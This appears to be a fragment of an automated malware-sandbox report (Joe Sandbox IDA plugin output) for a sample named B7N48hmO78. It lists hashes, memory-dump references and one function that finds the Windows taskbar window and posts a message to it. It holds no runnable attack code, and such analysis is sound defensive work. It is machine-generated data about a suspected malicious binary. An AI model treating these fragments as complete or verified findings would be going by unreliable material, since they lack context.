                                                                                                                  • Opcode ID: 722849c5287e24ba5f746beed5c9e69b44331865f8a82950e9f321524e1f7833
                                                                                                                  • Instruction ID: e19bdb81ade0cd55257c844208050cb03ac12d286ab3e0a067a06581a837426a
                                                                                                                  • Opcode Fuzzy Hash: 722849c5287e24ba5f746beed5c9e69b44331865f8a82950e9f321524e1f7833
                                                                                                                  • Instruction Fuzzy Hash: 3FD0A931B88324BBE2246330AC0BFCB2A089B08B20F400809F246BA0D0C8E0A9008614
                                                                                                                  Function 00E48698 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E486A2
                                                                                                                  • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00E486B5
                                                                                                                    • Part of subcall function 00E27A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00E27AD0
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.2066504803.0000000000DE1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DE0000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.2066479419.0000000000DE0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EAA000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066504803.0000000000EFC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066807273.0000000000F02000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.2066892249.0000000000F04000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_de0000_B7N48hmO78.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FindMessagePostSleepWindow
                                                                                                                  • String ID: Shell_TrayWnd
                                                                                                                  • API String ID: 529655941-2988720461
                                                                                                                  • Opcode ID: 31da267a78c0e46f834a9074c8b7d7ffcdf05b6062269f4493cc82b8ecff4f68
                                                                                                                  • Instruction ID: 977b4c613c99cc7183f370dce361fd48fb44d9c89acc8483d966ed3933604bb7
                                                                                                                  • Opcode Fuzzy Hash: 31da267a78c0e46f834a9074c8b7d7ffcdf05b6062269f4493cc82b8ecff4f68
                                                                                                                  • Instruction Fuzzy Hash: 3FD0A931B88324BBE2246330AC0BFCB2A089B04B20F000809F24ABA0D0C8E0A9008610